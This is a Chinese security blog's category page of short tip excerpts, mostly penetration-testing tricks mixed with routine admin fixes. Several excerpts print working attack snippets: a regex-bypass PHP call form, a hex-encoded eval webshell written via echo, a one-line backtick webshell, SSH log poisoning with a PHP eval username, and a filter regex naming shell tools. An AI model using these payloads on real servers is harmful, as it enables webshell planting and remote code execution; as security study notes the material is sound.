随笔分类 - 一句话Tips
收集各类Tips,采用问题-答案的方式,以最简单最直接的方式,尝试解决一些小问题
摘要:今天偶然看到一篇文章,其中有个payload引起了我的注意: (system)(ls); 他将我们常见的触发进行了变形,由之前的system("ls");变成了(system)(ls);一定程度的会破坏某些安全产品的正则。如果再加上PHP自带的.连接符,可能会有更高的概率去Bypass。
阅读全文
摘要:今天需要在Linux上安装一下这个,但是我发现出现了几个错误,错误一: 解决办法: apt-get update apt-get install libldap2-dev 之后又爆出另外一个错误: apt-get install libsasl2-dev 之后就能愉快玩耍了
阅读全文
摘要:最近的学习生活中,看到了好兄弟写出的这么一句话 让我陷入沉思,是否>被过滤,就意味着写入不了Webshell了?于是有了下面的Payload 只要|没被过滤,就有可能写入成功! echo 3c3f70687020406576616c28245f504f53545b277479736563275d29
阅读全文
摘要:今天做实验的时候发现域内的机器同步时间出现问题,域控是2022/4/4 xxxx 我的域机器是 2022/4/2 xxxx,差了好多,导致一大堆问题的出现,我们可以使用这条命令将自己的时间与域控的时间同步,以修复这类问题 Net time \\192.168.0.1 /set /y
阅读全文
摘要:一直以来,切换java版本一直是令我头疼的问题,一开始我的解决办法太蠢了,将所有需要高版本java的软件装在一台虚拟机中,所有低版本java的软件装在一台虚拟机中。但显然,这样并不是非常的方便。直到最近才知道可以利用jenv来切换版本。官方只有Mac或者Linux的,但是太穷了,买不起MAC,只能找
阅读全文
摘要:$filter = '/#|`| |[\x0a]|php|perl|dir|rm|ls|sleep|cut|sh|bash|grep|ash|nc|ping|curl|cat|tac|od|more|less|nl|vi|unique|head|tail|sort|rev|string|find|\
阅读全文
摘要:今天要安装一个模块,DSInternals,于是有了下面的梦幻过程 首先给我报错: 需要使用 NuGet 提供程序来与基于 NuGet 的存储库交互。请确保已安装 NuGet 提供程序“2.8.5.201”或更高版本 所以需要先解决NuGet版本问题,经过搜索得到: Install-PackageP
阅读全文
摘要:最近在做某个测试的时候已经可以RCE,但是payload长度受限制即echo不了整个的冰蝎webshell。 这个时候首先想到的是追加,把完整的一句话写入,这在前面是可行的: 但是后面我发现,单是一句话就超过了字数限制。也就是说,现在的任务是: 把很长的一句话追加写入,且不能换行 于是继续百度,尝试
阅读全文
摘要:<?=`$_GET[1]`?> 注意:在反引号里面,你应该注意括号中间是不能加引号的,比如['a']这种是不被允许的。 特点: 无php字样 非常短 利用echo+反引号执行命令的特征实现回显。
阅读全文
摘要:在做暴力破解的过程中,可能会遇到定长的问题。如果你单纯使用Burp的Number-Form 0001-9999 那实际上爆破的效果是从1-9999 很显然这不是我们想要的结果(如下图) 我们可以使用下方的这个设置来帮助我们定长爆破: 这样就可以真正的从0001-9999了。
阅读全文
摘要:0x01 包含登录日志 一般我们都直接放在UA中,然后开始找中间件的日志,有时候可能会有找不到的情况。此时,如果对方服务器开启SSH服务的话,我们可以使用包含SSH日志的方式 如下操作: SSH连接: ssh '<?php eval($_POST['a'];?>'@192.168.72.152 对方
阅读全文
摘要:对于此类问题,我们可以重新构建: docker-compose up -d --build
阅读全文
摘要:今天换VPS去腾讯云上想装个cobaltstrike的服务端结果启动总是失败,差点就要氪金200多买个2H4G的服务器了 在网上查明解决办法: 原因:内存使用超过%50时无法启动java虚拟机。 ./teamserver 服务器IP 连接密码 好像是这样 报错:INFO:os::commit_mem
阅读全文
